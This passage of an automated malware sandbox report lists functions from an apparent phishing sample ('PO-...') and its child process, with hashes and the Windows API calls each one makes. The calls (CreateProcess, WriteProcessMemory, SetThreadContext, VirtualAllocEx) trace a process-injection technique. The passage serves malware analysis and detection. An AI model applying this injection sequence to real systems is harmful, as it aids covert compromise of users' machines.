Opcode Fuzzy Hash: c0f29d4075877c45333cb5bb17a5f62a1050cdb0b000698bdd7169ed9293c22a
Instruction Fuzzy Hash: ED21C4B5D00248EFDB10CFAAD884ADEFBF8EB48310F14841AE914A7350D379A945CFA5

Function 04F911E8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,04F920D9,00000800,00000000,00000000), ref: 04F926EA

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9d502e24c9f25e8a78e73fb3cc2723a3570ec21ce6a1102a245d13fa5f9786af
Instruction ID: 61ddf14b93f9ff9662d94c10f9d3f6665b8654ceffeba3b260476e1e894d66b9
Opcode Fuzzy Hash: 9d502e24c9f25e8a78e73fb3cc2723a3570ec21ce6a1102a245d13fa5f9786af
Instruction Fuzzy Hash: 791106B6D00349DFEB10CF9AD444B9EFBF4AB48310F11845AD515A7610C375A945CFA5

Function 04F92679 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,04F920D9,00000800,00000000,00000000), ref: 04F926EA

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eb7c27af5a4fda7868fdac5ad8c635a05057b667fd53d92651c59e7d9ee6abf6
Instruction ID: 326e195d8d71752006f92fe503c12551b2998329e9396990e01d7f9f87c13cc4
Opcode Fuzzy Hash: eb7c27af5a4fda7868fdac5ad8c635a05057b667fd53d92651c59e7d9ee6abf6
Instruction Fuzzy Hash: F01114B6C00349DFEB20CFAAD444ADEFBF4EB48310F11842AD819A7610C375A946CFA5

Function 04F91FF8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 04F9205E

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0bc508f26561683c2838e1854456da7bc2b79d235f42861b4717b575a3db013a
Instruction ID: 76a172b61c77f779c5a50f20a1bfdfa8d1a2386e6f3a62e1e51bb894a8c7881f
Opcode Fuzzy Hash: 0bc508f26561683c2838e1854456da7bc2b79d235f42861b4717b575a3db013a
Instruction Fuzzy Hash: 35110FB5C006499FEB24CF9AC444B9EFBF4AB88320F11845AD818A7210C379A946CFA1

Function 00E2D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743875758.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e2d000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf48597a997ac246f2b1792acb037a33777f548d21fbb39bd0f655ad9e6461ca
Instruction ID: 5a3023fcadfde65a0ad682afe1b490f5cebee1f756146c036d8a5be0c5ce3f54
Opcode Fuzzy Hash: cf48597a997ac246f2b1792acb037a33777f548d21fbb39bd0f655ad9e6461ca
Instruction Fuzzy Hash: FC213A71508344EFDB14EF14EDC0B26BF65FB94324F24C569EA091B246C336E856CBA2

Function 00E3D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a5ed7b3b67ae6e0b5513c891b6d2c4ab9329fe07f7223fd874979b76947da2
Instruction ID: bd0712b8933060fdc481de922d2309de155208686977094a4ba20f6644a6c92c
Opcode Fuzzy Hash: 95a5ed7b3b67ae6e0b5513c891b6d2c4ab9329fe07f7223fd874979b76947da2
Instruction Fuzzy Hash: 7C214971508304EFDB01DF60EDC4B26BF65FB84318F20C5ADE8095B262C336D816CA62

Function 00E3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93b5c6cc17a8f55656bf9f8eb85a7cac6112f82c0c475b6d60e3dfcf3f2ff912
Instruction ID: 6e78b1d10d5e691ed6063dbd2472bcd046f3030fcdff4553e511280067a134c5
Opcode Fuzzy Hash: 93b5c6cc17a8f55656bf9f8eb85a7cac6112f82c0c475b6d60e3dfcf3f2ff912
Instruction Fuzzy Hash: 8F212571508304DFDB18DF24E8C8B16BF66FB84B18F20C569E8495B286C336D807CE62

Function 00E3D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd669800c02385241cd7fa45576a6445e65af6611c576cf3b6c864ca47207386
Instruction ID: 6cea65cc12a218968fecc8a1a0dc5491c9890f659954b7ac071703659f0d5c47
Opcode Fuzzy Hash: cd669800c02385241cd7fa45576a6445e65af6611c576cf3b6c864ca47207386
Instruction Fuzzy Hash: E821837550D3809FC706CF24D994715BF71EB46314F29C5DAD8498F6A7C33A980ACB62

Function 00E2D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743875758.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e2d000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
Instruction ID: 67456640684cb0e0b44b54fd357f960b13f303fd0338f726168313f7888d7d21
Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
Instruction Fuzzy Hash: D3112672408240DFCB11DF00D9C0B16BF72FB94324F24C6A9DD090B656C33AE856CBA2

Function 00E3D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743908855.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e3d000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction ID: ab56e8941c3f4a2a95a437fa59e7957258e18cc297fe2781fb86b8605515049c
Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction Fuzzy Hash: 5C118E75508240DFCB15CF50D9C4B16FF61FB84318F24C6A9D8494B666C33AD85ACB52

Non-executed Functions

Function 04F96FA0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f8032c546311445fdb250af742b1ac4eb13db86e1fc3b093a5b165dcc93170a
Instruction ID: 8acd2fb77a1e31c530acf1d98010d41eec9ec1fbedd774d6a67046cbed489551
Opcode Fuzzy Hash: 7f8032c546311445fdb250af742b1ac4eb13db86e1fc3b093a5b165dcc93170a
Instruction Fuzzy Hash: 021273F040978AAAE710CF65F94C1897BB1FBC5318F526209D2612E2F1DBBD194ACF44

Function 04F95F84 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a520244d8f6aa53269e1017f524491254ba91d3e3ee3d59a2f794774ea265b6
Instruction ID: ddc4df4dafcf5fbd2441ae16ffa13414622a7963de016a32be29003b4f6ea693
Opcode Fuzzy Hash: 2a520244d8f6aa53269e1017f524491254ba91d3e3ee3d59a2f794774ea265b6
Instruction Fuzzy Hash: 6FA15932E002199FEF15DFA5D88099EB7F2FF84304B15856AE906AB225DB35ED16CB40

Function 04F96F90 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08558c766b83a9705c4539e24aecb71d1ee2d6eb87bbd87f114e816690aee512
Instruction ID: 391e43252e2f36e58359d0d11854d1a991041cc74338a91050706fa461b4d1f9
Opcode Fuzzy Hash: 08558c766b83a9705c4539e24aecb71d1ee2d6eb87bbd87f114e816690aee512
Instruction Fuzzy Hash: 04C1E3B081578AABE710DF75F8481897BB1FBC5324F526609D2616B2F0DBBD188ACF44

Function 010D08A8 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8784d713ee84a5e5d6713056df3315cb895b04e188895bd1f53deec3f917d150
Instruction ID: 04412e27b9d11380824a4b3a6a7f8d3093f82b9607550fb82b4ab8f8368daa6d
Opcode Fuzzy Hash: 8784d713ee84a5e5d6713056df3315cb895b04e188895bd1f53deec3f917d150
Instruction Fuzzy Hash: AC610EB5E012099FDB09EFBAE85569E7FF2FBC8700F04C529D004A72A5EB7459068F50

Function 010D7B28 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad449f2c8a70362ff3619e37af03f69e94c96a970b35898e0d49841bd4403bf
Instruction ID: 127d824660bbf46c1a5d799636c6f7646017d2e3a6582753ab176efaf82e0ff4
Opcode Fuzzy Hash: fad449f2c8a70362ff3619e37af03f69e94c96a970b35898e0d49841bd4403bf
Instruction Fuzzy Hash: 88415571E05B588FEB5CCF6B8D4069EFAF3AFC9211F18C1BA855CAA265DB3005468F11

Function 010D7B38 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6756afd6110acb7f4b0ae93fa794eb2016e6d99b176b9ec8e5dbecc136aba47f
Instruction ID: 3f75876afda3331c44b05dca7a3cec39b7b0ff970a517eb1c2d3c73fc09edeb0
Opcode Fuzzy Hash: 6756afd6110acb7f4b0ae93fa794eb2016e6d99b176b9ec8e5dbecc136aba47f
Instruction Fuzzy Hash: 83415171E05B588BEB1CCF6B8D4079EFAF3AFC9211F14C1BA855CAA265EB3005858F01

Function 075B10D0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1762708370.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: true

Associated: 00000000.00000002.1762161732.0000000007550000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7550000_PO-0Y9005373R664.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d7f30eebac8818d951187e4d217207d8c5c6ca9a4d51e3bf2e02c9b643331c
Instruction ID: 63432118d40507e33785c964f5bceb3dd0c098c9141e32e1fa5fd1eecec893b2
Opcode Fuzzy Hash: e4d7f30eebac8818d951187e4d217207d8c5c6ca9a4d51e3bf2e02c9b643331c
Instruction Fuzzy Hash: 0D31C5B1E0465C8BEB58CF6BD8507EEBAF7BBC9300F14C4AAD409A6254DB340A458F51

Analysis Process: VvtddClQv.exePID: 3788, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	191
Total number of Limit Nodes:	8

Executed Functions

Function 070092CF Relevance: 1.8, APIs: 1, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 07009485

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: ActiveWindow
String ID:
API String ID: 2558294473-0
Opcode ID: 1cf77599193f5741bce58e904ce44a647f658aa605afd4f96bdbf22122d9cad7
Instruction ID: aa52b0b09eb7b801d56e6871fcb0ffd34c0c57a7f2ee85f65a93ebf223f15bf9
Opcode Fuzzy Hash: 1cf77599193f5741bce58e904ce44a647f658aa605afd4f96bdbf22122d9cad7
Instruction Fuzzy Hash: DAC1C2B1F103069FEB58AFB4C4647AE77E6AFC4310F148529E806EB381DF7498468B91

Function 07008464 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070086A6

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 301dd41231a143e80a564930f70b905aa73bdf048f829fb5d50027cdd0afa22c
Instruction ID: a143c970749f8d2bc171477f68074ed6986a3cbbf28ed1902dc4f3582b25c81b
Opcode Fuzzy Hash: 301dd41231a143e80a564930f70b905aa73bdf048f829fb5d50027cdd0afa22c
Instruction Fuzzy Hash: BBA16CB1D0071ADFEB50DF68C8417DEBBF2BB48320F148669E849A7280DB759985CF91

Function 07008470 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070086A6

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 18e53bb2e421a27e25a37c7ae443d06252d79bbd253bcb5bf1e07041af3665b0
Instruction ID: d15dd18dcbce0928f053b72bf9f6eb229691d2aebc68a2d22107db20a8f635e0
Opcode Fuzzy Hash: 18e53bb2e421a27e25a37c7ae443d06252d79bbd253bcb5bf1e07041af3665b0
Instruction Fuzzy Hash: 0F914BB1D0061ADFEB14CF68C8417DEBBF2BB48320F148669E849A7290DB749985CF91

Function 00AD4E8C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD63E9

Memory Dump Source

Source File: 0000000A.00000002.1819707680.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ad0000_VvtddClQv.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 926cd336a266bd169b3176bc1cf9dadd53ceed7e554431e9c0e54ed459d860eb
Instruction ID: 8e3d7fa2428b653f33418a692fe2c2dc5d0e5ff07e6236d34f2954a528f58384
Opcode Fuzzy Hash: 926cd336a266bd169b3176bc1cf9dadd53ceed7e554431e9c0e54ed459d860eb
Instruction Fuzzy Hash: 3541B0B0C00719CBEB24DFA9C944B9EBBF5BF89704F20806AD449AB251DBB56945CF90

Function 00AD632C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD63E9

Memory Dump Source

Source File: 0000000A.00000002.1819707680.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ad0000_VvtddClQv.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 64a96d8c238b3bce99ba729827ce856fcbe12f1721c2b501d634780aa68081e7
Instruction ID: 564214e6c3142519b64aa7282ccb970cc450ce450a034a29ee83f03cbef98498
Opcode Fuzzy Hash: 64a96d8c238b3bce99ba729827ce856fcbe12f1721c2b501d634780aa68081e7
Instruction Fuzzy Hash: 1641BFB0C00719CBEB24CFA9C944BCEBBF5BF89304F24846AD449AB251DB756945CF50

Function 07009E59 Relevance: 1.6, APIs: 1, Instructions: 74
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 07009F0D

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2306724edc47d4fab4a5b562329a9e4e6f785a62a54df3f1d8a792d3bc7432ad
Instruction ID: 1bbd28c64edf76d26c46f52abff5cbd38d6b8ccf67c6e964e2d4637a1522032a
Opcode Fuzzy Hash: 2306724edc47d4fab4a5b562329a9e4e6f785a62a54df3f1d8a792d3bc7432ad
Instruction Fuzzy Hash: 4921BAB19143898FDB60DFA9C5457DABBF4EF48328F10491AD485E7241D3B9A884CF91

Function 070081E0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07008278

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 06e7ad589d0a786fbb0f68cb4cbf3458e1bc2508157cd365b2c614ac6bb59635
Instruction ID: 23489ca8ccb6f4f5aed5435ed006e0d31c3ef4099d6e936b866bda1789b11652
Opcode Fuzzy Hash: 06e7ad589d0a786fbb0f68cb4cbf3458e1bc2508157cd365b2c614ac6bb59635
Instruction Fuzzy Hash: 092119B6900359DFDB10DFA9C8417DEBBF5FF48320F148429E919A7240C7799545CBA1

Function 070081E8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07008278

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 97ae74c35f0d78c232f53dde515fbe56312061f1b7055181c59610529a49683a
Instruction ID: c3e133366f5a92c412ce74d99a2f1f0766691e93e038e8cd381214bf66f3fcf4
Opcode Fuzzy Hash: 97ae74c35f0d78c232f53dde515fbe56312061f1b7055181c59610529a49683a
Instruction Fuzzy Hash: EC212AB1900359DFDB10CFAAC881BDEBBF5FF48310F148429E919A7240C7789540CBA1

Function 07007C11 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07007C96

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 74dbae8ded1e526739cac9f7e886cadfb1cb7275e78655879dbbfe468e0701ed
Instruction ID: 99c84386a70d5fb16e048a47911ba72b11d2c2f2155f536c7802d03e974723f0
Opcode Fuzzy Hash: 74dbae8ded1e526739cac9f7e886cadfb1cb7275e78655879dbbfe468e0701ed
Instruction Fuzzy Hash: C6216AB1D003099FEB10DFAAC445BEEBBF4AF48320F14842ED459A7240CB78A545CFA5

Function 070082D1 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07008358

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 186c7f78e4b50629dabde711425c710e50d0980c656fbba327891d22758866a6
Instruction ID: 5f3748cf72f4a0b26110a136c457f2d6a7a3ebfd802eeb6982811bd15b1f533c
Opcode Fuzzy Hash: 186c7f78e4b50629dabde711425c710e50d0980c656fbba327891d22758866a6
Instruction Fuzzy Hash: 122116B1C003599FDB10DFAAD881BEEBBF5FF48320F14882AE518A7240C7799541DBA1

Function 0700A6FE Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0700A782

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 2abd703d136ed2e60af670e4f6c841b635d59e2a7dfe08c63e49ac3b6633c376
Instruction ID: 02b2e46c1ad42520cefbbe17b23226d65db0c6d71578ef900ae70eb144efed96
Opcode Fuzzy Hash: 2abd703d136ed2e60af670e4f6c841b635d59e2a7dfe08c63e49ac3b6633c376
Instruction Fuzzy Hash: B02135B59003098FDB10DF99D844ADEBBF0FB48314F10CA59D419AB352D774A944CFA2

Function 070082D8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07008358

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3c7b5dee4a73f4baceb56e9f59781bd368dd88d7df9ee0a672088a8abfe20671
Instruction ID: 7d7872a8785777943b529f07455071f8a2b4b3f16b11a2a4e283a1d5ae3ab75b
Opcode Fuzzy Hash: 3c7b5dee4a73f4baceb56e9f59781bd368dd88d7df9ee0a672088a8abfe20671
Instruction Fuzzy Hash: 622116B1C003599FDB10DFAAC840BDEBBF5FF48310F14882AE518A7240C7799500DBA1

Function 07007C18 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07007C96

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 90c3cfe95695259c23ac78e7b785529ce8d191b92f4e27edcd815ea05f6e36a8
Instruction ID: 0201d6d9df23866d53adfab29b43361ba5f197b858178a81372e6409a6180b1f
Opcode Fuzzy Hash: 90c3cfe95695259c23ac78e7b785529ce8d191b92f4e27edcd815ea05f6e36a8
Instruction Fuzzy Hash: 80211AB1D003099FDB14DFAAC445BEEBBF4AF48324F148429D519A7241C778A545CFA5

Function 0700ACD8 Relevance: 1.6, APIs: 1, Instructions: 62
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 0700AD5D

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 0bb1a3893ec42cefba7450efa1bedf7786696c14be84f12e6c57bc87a443885b
Instruction ID: 198d4b31ede819f7dacfab9f02330c9be6c648f45002d2c666bb6bb2aa533514
Opcode Fuzzy Hash: 0bb1a3893ec42cefba7450efa1bedf7786696c14be84f12e6c57bc87a443885b
Instruction Fuzzy Hash: 2A21F3B6D0070A9FDB14CF9AD884ADEFBF5FB48320F10852AE419A7240D375A544CBA5

Function 0700A7EE Relevance: 1.6, APIs: 1, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 0700A861

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: b8ee2f860340b02b95153242fc0e2026e657c207b6e4fed69173a350fed83386
Instruction ID: c3af262862f78fdfdeeb61df77c4ceabe1fcbed54e6094f6e690dadf90aae1df
Opcode Fuzzy Hash: b8ee2f860340b02b95153242fc0e2026e657c207b6e4fed69173a350fed83386
Instruction Fuzzy Hash: 6C2127B1D00219DFEB14CF9AC844BEEFBF5EB88320F14842AD454A7290D778A945CFA1

Function 0700A7F0 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 0700A861

Memory Dump Source

Source File: 0000000A.00000002.1823865398.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_VvtddClQv.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 52523c0984290d2af6452f1a2d7ff022aa657d405694920b3916cf0869199e46
Instruction ID: 8e826f081214b7631507296fb53b0d6f827072e3415ed4fd0b1ac1fe1e1fccd1
Opcode Fuzzy Hash: 52523c0984290d2af6452f1a2d7ff022aa657d405694920b3916cf0869199e46
Instruction Fuzzy Hash: 1321F7B1D00219DFEB14DF9AC844BEEFBF5EB88320F14842AD454A7290D778A945CFA5

Function 07008120 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07008196

Memory Dump Source

